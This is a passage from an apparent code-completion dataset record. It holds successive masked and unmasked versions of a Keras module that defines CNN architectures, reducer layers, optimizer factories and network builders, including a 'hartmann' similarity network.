create_simple_cnn_ln, 'dilated_cnn_receptive_field_25':\n create_dilated_cnn_receptive_field_25,\n 'dilated_cnn_receptive_field_25_with_tanh':\n create_dilated_cnn_receptive_field_25_with_tanh, 'hartmann_cnn':\n create_hartmann_cnn}\n return cnn_factories[name]\n\n\n<mask token>\n\n\ndef build_simple_nn_for_training(input_shape, create_cnn, optimizer='Adam',\n lr=0.001, momentum=None, clipnorm=0.0, loss='emd', reducer='average',\n merge_layer='dot-product', weight_decay=None, weight_file=None):\n assert len(input_shape) == 5\n input_shape = list(input_shape)\n for i in range(len(input_shape)):\n if input_shape[i] != None:\n input_shape[i] = int(input_shape[i])\n input_shape = tuple(input_shape)\n D, N, W, H, C = input_shape\n x1_in = Input(shape=input_shape)\n x2_in = Input(shape=input_shape)\n x1 = TotalReshape((-1, W, H, C))(x1_in)\n x2 = TotalReshape((-1, W, H, C))(x2_in)\n cnn = create_cnn(input_shape=(W, H, C), kernel_regularizer=weight_decay)\n x1 = Flatten()(cnn(x1))\n x2 = Flatten()(cnn(x2))\n x = Dot(axes=-1, normalize=merge_layer == 'cosine-similarity')([x1, x2])\n x = TotalReshape((-1, D, N))(x)\n x = reducer_factory(reducer)(x)\n y = Activation('softmax')(x)\n model = Model(inputs=[x1_in, x2_in], outputs=y)\n model.compile(optimizer=optimizer_factory(optimizer, lr=lr, momentum=\n momentum, clipnorm=clipnorm), loss=loss_factory(loss), metrics=[\n 'accuracy', mae, mde])\n if weight_file:\n model.load_weights(weight_file, by_name=True)\n return model\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass TotalReshape(Layer):\n\n def __init__(self, target_shape, **kwargs):\n self.target_shape = target_shape\n super(TotalReshape, self).__init__(**kwargs)\n\n def compute_output_shape(self, input_shape):\n return tuple(x if x != -1 else None for x in self.target_shape)\n\n def call(self, x):\n return K.reshape(x, self.target_shape)\n\n\nclass BaseReducer(Layer):\n\n def __init__(self, **kwargs):\n super(BaseReducer, self).__init__(**kwargs)\n\n def compute_output_shape(self, input_shape):\n return input_shape[:-1]\n\n\nclass Average(BaseReducer):\n\n def call(self, x):\n return K.mean(x, axis=-1)\n\n\nclass Max(BaseReducer):\n\n def call(self, x):\n return K.max(x, axis=-1)\n\n\nclass TopKAverage(BaseReducer):\n\n def __init__(self, k, **kwargs):\n self.k = k\n super(TopKAverage, self).__init__(**kwargs)\n\n def call(self, x):\n if K.backend() == 'tensorflow':\n tf = K.tf\n x, _ = tf.nn.top_k(x, self.k, sorted=False)\n return K.mean(x, axis=-1)\n else:\n raise NotImplementedError(\n 'TopKAverage is not implemented for %s backend' % (K.\n backend(),))\n\n\n<mask token>\n\n\ndef mae(y_true, y_pred):\n \"\"\" Implementation of Mean average error\n \"\"\"\n return K.mean(K.abs(y_true - y_pred))\n\n\n<mask token>\n\n\ndef create_simple_cnn(input_shape, kernel_regularizer=None):\n common_params = dict(filters=32, kernel_size=3, kernel_regularizer=\n kernel_regularizer)\n return Sequential([Conv2D(input_shape=input_shape, **common_params),\n BatchNormalization(), Activation('relu'), Conv2D(**common_params),\n BatchNormalization(), Activation('relu'), Conv2D(**common_params),\n BatchNormalization(), Activation('relu'), Conv2D(**common_params),\n BatchNormalization(), Activation('relu'), Conv2D(**common_params),\n BatchNormalization()])\n\n\ndef create_simple_cnn_ln(input_shape, kernel_regularizer=None):\n common_params = dict(filters=32, kernel_size=3, kernel_regularizer=\n kernel_regularizer)\n return Sequential([Conv2D(input_shape=input_shape, **common_params),\n LayerNormalization(), Activation('relu'), Conv2D(**common_params),\n LayerNormalization(), Activation('relu'), Conv2D(**common_params),\n LayerNormalization(), Activation('relu'), Conv2D(**common_params),\n LayerNormalization(), Activation('relu'), Conv2D(**common_params),\n LayerNormalization()])\n\n\ndef create_dilated_cnn_receptive_field_25(input_shape, kernel_regularizer=None\n ):\n return Sequential([Conv2D(filters=32, kernel_size=5, input_shape=\n input_shape, kernel_regularizer=kernel_regularizer),\n BatchNormalization(), Activation('relu'), Conv2D(filters=32,\n kernel_size=5, kernel_regularizer=kernel_regularizer),\n BatchNormalization(), Activation('relu'), Conv2D(filters=32,\n kernel_size=5, kernel_regularizer=kernel_regularizer, dilation_rate\n =2), BatchNormalization(), Activation('relu'), Conv2D(filters=32,\n kernel_size=3, kernel_regularizer=kernel_regularizer),\n BatchNormalization(), Activation('relu'), Conv2D(filters=32,\n kernel_size=3, kernel_regularizer=kernel_regularizer),\n BatchNormalization(), Activation('relu'), Conv2D(filters=32,\n kernel_size=3, kernel_regularizer=kernel_regularizer),\n BatchNormalization(), Activation('relu'), Conv2D(filters=32,\n kernel_size=3, kernel_regularizer=kernel_regularizer),\n BatchNormalization()])\n\n\n<mask token>\n\n\ndef cnn_factory(name):\n cnn_factories = {'simple_cnn': create_simple_cnn, 'simple_cnn_ln':\n create_simple_cnn_ln, 'dilated_cnn_receptive_field_25':\n create_dilated_cnn_receptive_field_25,\n 'dilated_cnn_receptive_field_25_with_tanh':\n create_dilated_cnn_receptive_field_25_with_tanh, 'hartmann_cnn':\n create_hartmann_cnn}\n return cnn_factories[name]\n\n\n<mask token>\n\n\ndef build_simple_nn_for_training(input_shape, create_cnn, optimizer='Adam',\n lr=0.001, momentum=None, clipnorm=0.0, loss='emd', reducer='average',\n merge_layer='dot-product', weight_decay=None, weight_file=None):\n assert len(input_shape) == 5\n input_shape = list(input_shape)\n for i in range(len(input_shape)):\n if input_shape[i] != None:\n input_shape[i] = int(input_shape[i])\n input_shape = tuple(input_shape)\n D, N, W, H, C = input_shape\n x1_in = Input(shape=input_shape)\n x2_in = Input(shape=input_shape)\n x1 = TotalReshape((-1, W, H, C))(x1_in)\n x2 = TotalReshape((-1, W, H, C))(x2_in)\n cnn = create_cnn(input_shape=(W, H, C), kernel_regularizer=weight_decay)\n x1 = Flatten()(cnn(x1))\n x2 = Flatten()(cnn(x2))\n x = Dot(axes=-1, normalize=merge_layer == 'cosine-similarity')([x1, x2])\n x = TotalReshape((-1, D, N))(x)\n x = reducer_factory(reducer)(x)\n y = Activation('softmax')(x)\n model = Model(inputs=[x1_in, x2_in], outputs=y)\n model.compile(optimizer=optimizer_factory(optimizer, lr=lr, momentum=\n momentum, clipnorm=clipnorm), loss=loss_factory(loss), metrics=[\n 'accuracy', mae, mde])\n if weight_file:\n model.load_weights(weight_file, by_name=True)\n return model\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass TotalReshape(Layer):\n\n def __init__(self, target_shape, **kwargs):\n self.target_shape = target_shape\n super(TotalReshape, self).__init__(**kwargs)\n\n def compute_output_shape(self, input_shape):\n return tuple(x if x != -1 else None for x in self.target_shape)\n\n def call(self, x):\n return K.reshape(x, self.target_shape)\n\n\nclass BaseReducer(Layer):\n\n def __init__(self, **kwargs):\n super(BaseReducer, self).__init__(**kwargs)\n\n def compute_output_shape(self, input_shape):\n return input_shape[:-1]\n\n\nclass Average(BaseReducer):\n\n def call(self, x):\n return K.mean(x, axis=-1)\n\n\nclass Max(BaseReducer):\n\n def call(self, x):\n return K.max(x, axis=-1)\n\n\nclass TopKAverage(BaseReducer):\n\n def __init__(self, k, **kwargs):\n self.k = k\n super(TopKAverage, self).__init__(**kwargs)\n\n def call(self, x):\n if K.backend() == 'tensorflow':\n tf = K.tf\n x, _ = tf.nn.top_k(x, self.k, sorted=False)\n return K.mean(x, axis=-1)\n else:\n raise NotImplementedError(\n 'TopKAverage is not implemented for %s backend' % (K.\n backend(),))\n\n\n<mask token>\n\n\ndef mae(y_true, y_pred):\n \"\"\" Implementation of Mean average error\n \"\"\"\n return K.mean(K.abs(y_true - y_pred))\n\n\ndef mde(y_true, y_pred):\n return K.mean(K.cast(K.abs(K.argmax(y_true, axis=1) - K.argmax(y_pred,\n axis=1)), K.floatx()))\n\n\ndef create_simple_cnn(input_shape, kernel_regularizer=None):\n common_params = dict(filters=32, kernel_size=3, kernel_regularizer=\n kernel_regularizer)\n return Sequential([Conv2D(input_shape=input_shape, **common_params),\n BatchNormalization(), Activation('relu'), Conv2D(**common_params),\n BatchNormalization(), Activation('relu'), Conv2D(**common_params),\n BatchNormalization(), Activation('relu'), Conv2D(**common_params),\n BatchNormalization(), Activation('relu'), Conv2D(**common_params),\n BatchNormalization()])\n\n\ndef create_simple_cnn_ln(input_shape, kernel_regularizer=None):\n common_params = dict(filters=32, kernel_size=3, kernel_regularizer=\n kernel_regularizer)\n return Sequential([Conv2D(input_shape=input_shape, **common_params),\n LayerNormalization(), Activation('relu'), Conv2D(**common_params),\n LayerNormalization(), Activation('relu'), Conv2D(**common_params),\n LayerNormalization(), Activation('relu'), Conv2D(**common_params),\n LayerNormalization(), Activation('relu'), Conv2D(**common_params),\n LayerNormalization()])\n\n\ndef create_dilated_cnn_receptive_field_25(input_shape, kernel_regularizer=None\n ):\n return Sequential([Conv2D(filters=32, kernel_size=5, input_shape=\n input_shape, kernel_regularizer=kernel_regularizer),\n BatchNormalization(), Activation('relu'), Conv2D(filters=32,\n kernel_size=5, kernel_regularizer=kernel_regularizer),\n BatchNormalization(), Activation('relu'), Conv2D(filters=32,\n kernel_size=5, kernel_regularizer=kernel_regularizer, dilation_rate\n =2), BatchNormalization(), Activation('relu'), Conv2D(filters=32,\n kernel_size=3, kernel_regularizer=kernel_regularizer),\n BatchNormalization(), Activation('relu'), Conv2D(filters=32,\n kernel_size=3, kernel_regularizer=kernel_regularizer),\n BatchNormalization(), Activation('relu'), Conv2D(filters=32,\n kernel_size=3, kernel_regularizer=kernel_regularizer),\n BatchNormalization(), Activation('relu'), Conv2D(filters=32,\n kernel_size=3, kernel_regularizer=kernel_regularizer),\n BatchNormalization()])\n\n\ndef create_dilated_cnn_receptive_field_25_with_tanh(input_shape,\n kernel_regularizer=None):\n return Sequential([Conv2D(filters=32, kernel_size=5, input_shape=\n input_shape, kernel_regularizer=kernel_regularizer),\n BatchNormalization(), Activation('tanh'), Conv2D(filters=32,\n kernel_size=5, kernel_regularizer=kernel_regularizer),\n BatchNormalization(), Activation('tanh'), Conv2D(filters=32,\n kernel_size=5, kernel_regularizer=kernel_regularizer, dilation_rate\n =2), BatchNormalization(), Activation('tanh'), Conv2D(filters=32,\n kernel_size=3, kernel_regularizer=kernel_regularizer),\n BatchNormalization(), Activation('tanh'), Conv2D(filters=32,\n kernel_size=3, kernel_regularizer=kernel_regularizer),\n BatchNormalization(), Activation('tanh'), Conv2D(filters=32,\n kernel_size=3, kernel_regularizer=kernel_regularizer),\n BatchNormalization(), Activation('tanh'), Conv2D(filters=32,\n kernel_size=3, kernel_regularizer=kernel_regularizer),\n BatchNormalization()])\n\n\ndef create_hartmann_cnn(input_shape, kernel_regularizer=None):\n return Sequential([Conv2D(filters=32, kernel_size=5, input_shape=\n input_shape), Activation('tanh'), MaxPooling2D(pool_size=(2, 2)),\n Conv2D(filters=64, kernel_size=5), Activation('tanh'), MaxPooling2D\n (pool_size=(2, 2))])\n\n\ndef cnn_factory(name):\n cnn_factories = {'simple_cnn': create_simple_cnn, 'simple_cnn_ln':\n create_simple_cnn_ln, 'dilated_cnn_receptive_field_25':\n create_dilated_cnn_receptive_field_25,\n 'dilated_cnn_receptive_field_25_with_tanh':\n create_dilated_cnn_receptive_field_25_with_tanh, 'hartmann_cnn':\n create_hartmann_cnn}\n return cnn_factories[name]\n\n\n<mask token>\n\n\ndef build_simple_cnn(input_shape, create_cnn, optimizer='Adam', lr=0.001,\n momentum=None, clipnorm=0.0, loss='mse', reducer='average', merge_layer\n ='dot-product', weight_decay=None, weight_file=None):\n assert len(input_shape) == 5\n D, N, W, H, C = input_shape\n model = create_cnn(input_shape=(None, None, C), kernel_regularizer=\n weight_decay)\n model.compile(optimizer=optimizer_factory(optimizer, lr=lr, momentum=\n momentum, clipnorm=clipnorm), loss=loss_factory(loss))\n if weight_file:\n try:\n f = h5py.File(weight_file, 'r')\n keys = [os.path.join(model.name, w.name) for l in model.layers for\n w in l.weights]\n weights = [f[os.path.join('model_weights', k)][:] for k in keys]\n model.set_weights(weights)\n except:\n model.load_weights(weight_file, by_name=True)\n return model\n\n\ndef build_simple_nn_for_training(input_shape, create_cnn, optimizer='Adam',\n lr=0.001, momentum=None, clipnorm=0.0, loss='emd', reducer='average',\n merge_layer='dot-product', weight_decay=None, weight_file=None):\n assert len(input_shape) == 5\n input_shape = list(input_shape)\n for i in range(len(input_shape)):\n if input_shape[i] != None:\n input_shape[i] = int(input_shape[i])\n input_shape = tuple(input_shape)\n D, N, W, H, C = input_shape\n x1_in = Input(shape=input_shape)\n x2_in = Input(shape=input_shape)\n x1 = TotalReshape((-1, W, H, C))(x1_in)\n x2 = TotalReshape((-1, W, H, C))(x2_in)\n cnn = create_cnn(input_shape=(W, H, C), kernel_regularizer=weight_decay)\n x1 = Flatten()(cnn(x1))\n x2 = Flatten()(cnn(x2))\n x = Dot(axes=-1, normalize=merge_layer == 'cosine-similarity')([x1, x2])\n x = TotalReshape((-1, D, N))(x)\n x = reducer_factory(reducer)(x)\n y = Activation('softmax')(x)\n model = Model(inputs=[x1_in, x2_in], outputs=y)\n model.compile(optimizer=optimizer_factory(optimizer, lr=lr, momentum=\n momentum, clipnorm=clipnorm), loss=loss_factory(loss), metrics=[\n 'accuracy', mae, mde])\n if weight_file:\n model.load_weights(weight_file, by_name=True)\n return model\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass TotalReshape(Layer):\n\n def __init__(self, target_shape, **kwargs):\n self.target_shape = target_shape\n super(TotalReshape, self).__init__(**kwargs)\n\n def compute_output_shape(self, input_shape):\n return tuple(x if x != -1 else None for x in self.target_shape)\n\n def call(self, x):\n return K.reshape(x, self.target_shape)\n\n\nclass BaseReducer(Layer):\n\n def __init__(self, **kwargs):\n super(BaseReducer, self).__init__(**kwargs)\n\n def compute_output_shape(self, input_shape):\n return input_shape[:-1]\n\n\nclass Average(BaseReducer):\n\n def call(self, x):\n return K.mean(x, axis=-1)\n\n\nclass Max(BaseReducer):\n\n def call(self, x):\n return K.max(x, axis=-1)\n\n\nclass TopKAverage(BaseReducer):\n\n def __init__(self, k, **kwargs):\n self.k = k\n super(TopKAverage, self).__init__(**kwargs)\n\n def call(self, x):\n if K.backend() == 'tensorflow':\n tf = K.tf\n x, _ = tf.nn.top_k(x, self.k, sorted=False)\n return K.mean(x, axis=-1)\n else:\n raise NotImplementedError(\n 'TopKAverage is not implemented for %s backend' % (K.\n backend(),))\n\n\ndef reducer_factory(reducer, k=3):\n if reducer == 'max':\n return Max()\n elif reducer == 'average':\n return Average()\n elif reducer == 'topK':\n return TopKAverage(k)\n\n\ndef mae(y_true, y_pred):\n \"\"\" Implementation of Mean average error\n \"\"\"\n return K.mean(K.abs(y_true - y_pred))\n\n\ndef mde(y_true, y_pred):\n return K.mean(K.cast(K.abs(K.argmax(y_true, axis=1) - K.argmax(y_pred,\n axis=1)), K.floatx()))\n\n\ndef create_simple_cnn(input_shape, kernel_regularizer=None):\n common_params = dict(filters=32, kernel_size=3, kernel_regularizer=\n kernel_regularizer)\n return Sequential([Conv2D(input_shape=input_shape, **common_params),\n BatchNormalization(), Activation('relu'), Conv2D(**common_params),\n BatchNormalization(), Activation('relu'), Conv2D(**common_params),\n BatchNormalization(), Activation('relu'), Conv2D(**common_params),\n BatchNormalization(), Activation('relu'), Conv2D(**common_params),\n BatchNormalization()])\n\n\ndef create_simple_cnn_ln(input_shape, kernel_regularizer=None):\n common_params = dict(filters=32, kernel_size=3, kernel_regularizer=\n kernel_regularizer)\n return Sequential([Conv2D(input_shape=input_shape, **common_params),\n LayerNormalization(), Activation('relu'), Conv2D(**common_params),\n LayerNormalization(), Activation('relu'), Conv2D(**common_params),\n LayerNormalization(), Activation('relu'), Conv2D(**common_params),\n LayerNormalization(), Activation('relu'), Conv2D(**common_params),\n LayerNormalization()])\n\n\ndef create_dilated_cnn_receptive_field_25(input_shape, kernel_regularizer=None\n ):\n return Sequential([Conv2D(filters=32, kernel_size=5, input_shape=\n input_shape, kernel_regularizer=kernel_regularizer),\n BatchNormalization(), Activation('relu'), Conv2D(filters=32,\n kernel_size=5, kernel_regularizer=kernel_regularizer),\n BatchNormalization(), Activation('relu'), Conv2D(filters=32,\n kernel_size=5, kernel_regularizer=kernel_regularizer, dilation_rate\n =2), BatchNormalization(), Activation('relu'), Conv2D(filters=32,\n kernel_size=3, kernel_regularizer=kernel_regularizer),\n BatchNormalization(), Activation('relu'), Conv2D(filters=32,\n kernel_size=3, kernel_regularizer=kernel_regularizer),\n BatchNormalization(), Activation('relu'), Conv2D(filters=32,\n kernel_size=3, kernel_regularizer=kernel_regularizer),\n BatchNormalization(), Activation('relu'), Conv2D(filters=32,\n kernel_size=3, kernel_regularizer=kernel_regularizer),\n BatchNormalization()])\n\n\ndef create_dilated_cnn_receptive_field_25_with_tanh(input_shape,\n kernel_regularizer=None):\n return Sequential([Conv2D(filters=32, kernel_size=5, input_shape=\n input_shape, kernel_regularizer=kernel_regularizer),\n BatchNormalization(), Activation('tanh'), Conv2D(filters=32,\n kernel_size=5, kernel_regularizer=kernel_regularizer),\n BatchNormalization(), Activation('tanh'), Conv2D(filters=32,\n kernel_size=5, kernel_regularizer=kernel_regularizer, dilation_rate\n =2), BatchNormalization(), Activation('tanh'), Conv2D(filters=32,\n kernel_size=3, kernel_regularizer=kernel_regularizer),\n BatchNormalization(), Activation('tanh'), Conv2D(filters=32,\n kernel_size=3, kernel_regularizer=kernel_regularizer),\n BatchNormalization(), Activation('tanh'), Conv2D(filters=32,\n kernel_size=3, kernel_regularizer=kernel_regularizer),\n BatchNormalization(), Activation('tanh'), Conv2D(filters=32,\n kernel_size=3, kernel_regularizer=kernel_regularizer),\n BatchNormalization()])\n\n\ndef create_hartmann_cnn(input_shape, kernel_regularizer=None):\n return Sequential([Conv2D(filters=32, kernel_size=5, input_shape=\n input_shape), Activation('tanh'), MaxPooling2D(pool_size=(2, 2)),\n Conv2D(filters=64, kernel_size=5), Activation('tanh'), MaxPooling2D\n (pool_size=(2, 2))])\n\n\ndef cnn_factory(name):\n cnn_factories = {'simple_cnn': create_simple_cnn, 'simple_cnn_ln':\n create_simple_cnn_ln, 'dilated_cnn_receptive_field_25':\n create_dilated_cnn_receptive_field_25,\n 'dilated_cnn_receptive_field_25_with_tanh':\n create_dilated_cnn_receptive_field_25_with_tanh, 'hartmann_cnn':\n create_hartmann_cnn}\n return cnn_factories[name]\n\n\ndef optimizer_factory(optimizer, lr, momentum=None, clipnorm=0.0, clipvalue=1):\n if optimizer == 'Adam':\n return Adam(lr=lr, clipnorm=clipnorm, clipvalue=clipvalue)\n elif optimizer == 'SGD':\n return SGD(lr=lr, momentum=momentum, clipnorm=clipnorm, clipvalue=\n clipvalue)\n\n\ndef kernel_regularizer_factory(regularizer_factor):\n if regularizer_factor == 0.0:\n return None\n else:\n return regularizers.l2(regularizer_factor)\n\n\ndef build_simple_cnn(input_shape, create_cnn, optimizer='Adam', lr=0.001,\n momentum=None, clipnorm=0.0, loss='mse', reducer='average', merge_layer\n ='dot-product', weight_decay=None, weight_file=None):\n assert len(input_shape) == 5\n D, N, W, H, C = input_shape\n model = create_cnn(input_shape=(None, None, C), kernel_regularizer=\n weight_decay)\n model.compile(optimizer=optimizer_factory(optimizer, lr=lr, momentum=\n momentum, clipnorm=clipnorm), loss=loss_factory(loss))\n if weight_file:\n try:\n f = h5py.File(weight_file, 'r')\n keys = [os.path.join(model.name, w.name) for l in model.layers for\n w in l.weights]\n weights = [f[os.path.join('model_weights', k)][:] for k in keys]\n model.set_weights(weights)\n except:\n model.load_weights(weight_file, by_name=True)\n return model\n\n\ndef build_simple_nn_for_training(input_shape, create_cnn, optimizer='Adam',\n lr=0.001, momentum=None, clipnorm=0.0, loss='emd', reducer='average',\n merge_layer='dot-product', weight_decay=None, weight_file=None):\n assert len(input_shape) == 5\n input_shape = list(input_shape)\n for i in range(len(input_shape)):\n if input_shape[i] != None:\n input_shape[i] = int(input_shape[i])\n input_shape = tuple(input_shape)\n D, N, W, H, C = input_shape\n x1_in = Input(shape=input_shape)\n x2_in = Input(shape=input_shape)\n x1 = TotalReshape((-1, W, H, C))(x1_in)\n x2 = TotalReshape((-1, W, H, C))(x2_in)\n cnn = create_cnn(input_shape=(W, H, C), kernel_regularizer=weight_decay)\n x1 = Flatten()(cnn(x1))\n x2 = Flatten()(cnn(x2))\n x = Dot(axes=-1, normalize=merge_layer == 'cosine-similarity')([x1, x2])\n x = TotalReshape((-1, D, N))(x)\n x = reducer_factory(reducer)(x)\n y = Activation('softmax')(x)\n model = Model(inputs=[x1_in, x2_in], outputs=y)\n model.compile(optimizer=optimizer_factory(optimizer, lr=lr, momentum=\n momentum, clipnorm=clipnorm), loss=loss_factory(loss), metrics=[\n 'accuracy', mae, mde])\n if weight_file:\n model.load_weights(weight_file, by_name=True)\n return model\n\n\ndef build_hartmann_network(input_shape, create_cnn=create_hartmann_cnn,\n optimizer='SGD', lr=0.001, momentum=None, clipnorm=0.0, loss=None,\n reducer=None, merge_layer=None, weight_decay=None, weight_file=None):\n assert len(input_shape) == 3\n H, W, C = input_shape\n cnn = create_hartmann_cnn(input_shape=(None, None, C))\n sim = Sequential([Conv2D(filters=2048, kernel_size=5, input_shape=K.\n int_shape(cnn.output)[1:]), Activation('relu'), Conv2D(filters=2048,\n kernel_size=1), Activation('relu'), Conv2D(filters=2, kernel_size=1\n ), Activation('softmax')])\n x_in = [Input(shape=input_shape) for i in range(5)]\n x = [cnn(xi) for xi in x_in]\n x = KerasAverage()(x)\n y = sim(x)\n model = Model(inputs=x_in, outputs=y)\n model.compile(optimizer=optimizer_factory(optimizer, lr=lr, momentum=\n momentum, clipnorm=clipnorm), loss='categorical_crossentropy',\n metrics=['accuracy'])\n cnn.compile('sgd', 'mse')\n sim.compile('sgd', 'mse')\n model.cnn = cnn\n model.sim = sim\n if weight_file:\n model.load_weights(weight_file, by_name=True)\n return model\n\n\ndef get_nn(name):\n models = {'simple_cnn': build_simple_cnn, 'simple_nn_for_training':\n build_simple_nn_for_training, 'hartmann': build_hartmann_network}\n return models[name]\n",
"step-5": "import os\n\nimport h5py\nimport numpy as np\n\nfrom keras import backend as K\nfrom keras.layers import Activation, BatchNormalization, Conv2D, Dense, Dot, \\\n Dropout, Flatten, Input, MaxPooling2D, GlobalAveragePooling2D\nfrom keras import regularizers\nfrom keras.layers import Average as KerasAverage\nfrom keras.models import Sequential, Model\nfrom keras.optimizers import Adam, SGD\nfrom keras.engine.topology import Layer\n\nfrom .layers import LayerNormalization, CustomSoftmax\nfrom .tf_implementations.loss_functions import loss_factory\n\n\nclass TotalReshape(Layer):\n def __init__(self, target_shape, **kwargs):\n self.target_shape = target_shape\n super(TotalReshape, self).__init__(**kwargs)\n\n def compute_output_shape(self, input_shape):\n return tuple(\n x if x != -1 else None\n for x in self.target_shape\n )\n\n def call(self, x):\n return K.reshape(x, self.target_shape)\n\n\nclass BaseReducer(Layer):\n def __init__(self, **kwargs):\n super(BaseReducer, self).__init__(**kwargs)\n\n def compute_output_shape(self, input_shape):\n return input_shape[:-1]\n\n\nclass Average(BaseReducer):\n def call(self, x):\n return K.mean(x, axis=-1)\n\n\nclass Max(BaseReducer):\n def call(self, x):\n return K.max(x, axis=-1)\n\n\nclass TopKAverage(BaseReducer):\n def __init__(self, k, **kwargs):\n self.k = k\n super(TopKAverage, self).__init__(**kwargs)\n\n def call(self, x):\n if K.backend() == \"tensorflow\":\n tf = K.tf\n x, _ = tf.nn.top_k(x, self.k, sorted=False)\n return K.mean(x, axis=-1)\n else:\n raise NotImplementedError(\"TopKAverage is not implemented for \"\n \" %s backend\" % (K.backend(),))\n\n\ndef reducer_factory(reducer, k=3):\n # Set the type of the reducer to be used\n if reducer == \"max\":\n return Max()\n elif reducer == \"average\":\n return Average()\n elif reducer == \"topK\":\n return TopKAverage(k)\n\n\ndef mae(y_true, y_pred):\n \"\"\" Implementation of Mean average error\n \"\"\"\n return K.mean(K.abs(y_true - y_pred))\n\n\ndef mde(y_true, y_pred):\n return K.mean(K.cast(\n K.abs(K.argmax(y_true, axis=1) - K.argmax(y_pred, axis=1)),\n K.floatx()\n ))\n\n\ndef create_simple_cnn(input_shape, kernel_regularizer=None):\n common_params = dict(\n filters=32,\n kernel_size=3,\n kernel_regularizer=kernel_regularizer\n )\n return Sequential([\n Conv2D(input_shape=input_shape, **common_params),\n BatchNormalization(),\n Activation(\"relu\"),\n Conv2D(**common_params),\n BatchNormalization(),\n Activation(\"relu\"),\n Conv2D(**common_params),\n BatchNormalization(),\n Activation(\"relu\"),\n Conv2D(**common_params),\n BatchNormalization(),\n Activation(\"relu\"),\n Conv2D(**common_params),\n BatchNormalization()\n ])\n\n\ndef create_simple_cnn_ln(input_shape, kernel_regularizer=None):\n common_params = dict(\n filters=32,\n kernel_size=3,\n kernel_regularizer=kernel_regularizer\n )\n return Sequential([\n Conv2D(input_shape=input_shape, **common_params),\n LayerNormalization(),\n Activation(\"relu\"),\n Conv2D(**common_params),\n LayerNormalization(),\n Activation(\"relu\"),\n Conv2D(**common_params),\n LayerNormalization(),\n Activation(\"relu\"),\n Conv2D(**common_params),\n LayerNormalization(),\n Activation(\"relu\"),\n Conv2D(**common_params),\n LayerNormalization()\n ])\n\n\ndef create_dilated_cnn_receptive_field_25(\n input_shape,\n kernel_regularizer=None\n):\n return Sequential([\n Conv2D(\n filters=32,\n kernel_size=5,\n input_shape=input_shape,\n kernel_regularizer=kernel_regularizer\n ),\n BatchNormalization(),\n Activation(\"relu\"),\n Conv2D(\n filters=32,\n kernel_size=5,\n kernel_regularizer=kernel_regularizer\n ),\n BatchNormalization(),\n Activation(\"relu\"),\n Conv2D(\n filters=32,\n kernel_size=5,\n kernel_regularizer=kernel_regularizer,\n dilation_rate=2\n ),\n BatchNormalization(),\n Activation(\"relu\"),\n Conv2D(\n filters=32,\n kernel_size=3,\n kernel_regularizer=kernel_regularizer,\n ),\n BatchNormalization(),\n Activation(\"relu\"),\n Conv2D(\n filters=32,\n kernel_size=3,\n kernel_regularizer=kernel_regularizer\n ),\n BatchNormalization(),\n Activation(\"relu\"),\n Conv2D(\n filters=32,\n kernel_size=3,\n kernel_regularizer=kernel_regularizer\n ),\n BatchNormalization(),\n Activation(\"relu\"),\n Conv2D(\n filters=32,\n kernel_size=3,\n kernel_regularizer=kernel_regularizer\n ),\n BatchNormalization()\n ])\n\n\ndef create_dilated_cnn_receptive_field_25_with_tanh(\n input_shape,\n kernel_regularizer=None\n):\n return Sequential([\n Conv2D(\n filters=32,\n kernel_size=5,\n input_shape=input_shape,\n kernel_regularizer=kernel_regularizer\n ),\n BatchNormalization(),\n Activation(\"tanh\"),\n Conv2D(\n filters=32,\n kernel_size=5,\n kernel_regularizer=kernel_regularizer\n ),\n BatchNormalization(),\n Activation(\"tanh\"),\n Conv2D(\n filters=32,\n kernel_size=5,\n kernel_regularizer=kernel_regularizer,\n dilation_rate=2\n ),\n BatchNormalization(),\n Activation(\"tanh\"),\n Conv2D(\n filters=32,\n kernel_size=3,\n kernel_regularizer=kernel_regularizer,\n ),\n BatchNormalization(),\n Activation(\"tanh\"),\n Conv2D(\n filters=32,\n kernel_size=3,\n kernel_regularizer=kernel_regularizer\n ),\n BatchNormalization(),\n Activation(\"tanh\"),\n Conv2D(\n filters=32,\n kernel_size=3,\n kernel_regularizer=kernel_regularizer\n ),\n BatchNormalization(),\n Activation(\"tanh\"),\n Conv2D(\n filters=32,\n kernel_size=3,\n kernel_regularizer=kernel_regularizer\n ),\n BatchNormalization()\n ])\n\n\ndef create_hartmann_cnn(input_shape, kernel_regularizer=None):\n return Sequential([\n Conv2D(filters=32, kernel_size=5, input_shape=input_shape),\n Activation(\"tanh\"),\n MaxPooling2D(pool_size=(2, 2)),\n Conv2D(filters=64, kernel_size=5),\n Activation(\"tanh\"),\n MaxPooling2D(pool_size=(2, 2))\n ])\n\n\ndef cnn_factory(name):\n cnn_factories = {\n \"simple_cnn\": create_simple_cnn,\n \"simple_cnn_ln\": create_simple_cnn_ln,\n \"dilated_cnn_receptive_field_25\":\n create_dilated_cnn_receptive_field_25,\n \"dilated_cnn_receptive_field_25_with_tanh\":\n create_dilated_cnn_receptive_field_25_with_tanh,\n \"hartmann_cnn\": create_hartmann_cnn\n }\n return cnn_factories[name]\n\n\ndef optimizer_factory(optimizer, lr, momentum=None, clipnorm=0.0, clipvalue=1):\n # Set the type of optimizer to be used\n if optimizer == \"Adam\":\n return Adam(lr=lr, clipnorm=clipnorm, clipvalue=clipvalue)\n elif optimizer == \"SGD\":\n return SGD(lr=lr, momentum=momentum, clipnorm=clipnorm,\n clipvalue=clipvalue)\n\n\ndef kernel_regularizer_factory(regularizer_factor):\n if regularizer_factor == 0.0:\n return None\n else:\n return regularizers.l2(regularizer_factor)\n\n\ndef build_simple_cnn(\n input_shape,\n create_cnn,\n optimizer=\"Adam\",\n lr=1e-3,\n momentum=None,\n clipnorm=0.0,\n loss=\"mse\",\n reducer=\"average\",\n merge_layer=\"dot-product\",\n weight_decay=None,\n weight_file=None\n):\n # Make sure that we have a proper input shape\n # TODO: Maybe change this to 3, because we finally need only the\n # patch_shape?\n assert len(input_shape) == 5\n\n # Unpack the input shape to make the code more readable\n D, N, W, H, C = input_shape\n\n model = create_cnn(\n input_shape=(None, None, C),\n kernel_regularizer=weight_decay\n )\n model.compile(\n optimizer=optimizer_factory(\n optimizer,\n lr=lr,\n momentum=momentum,\n clipnorm=clipnorm\n ),\n loss=loss_factory(loss)\n )\n\n # If there is a weight file specified load the weights\n if weight_file:\n try:\n f = h5py.File(weight_file, \"r\")\n keys = [os.path.join(model.name, w.name)\n for l in model.layers for w in l.weights]\n weights = [f[os.path.join(\"model_weights\", k)][:] for k in keys]\n\n 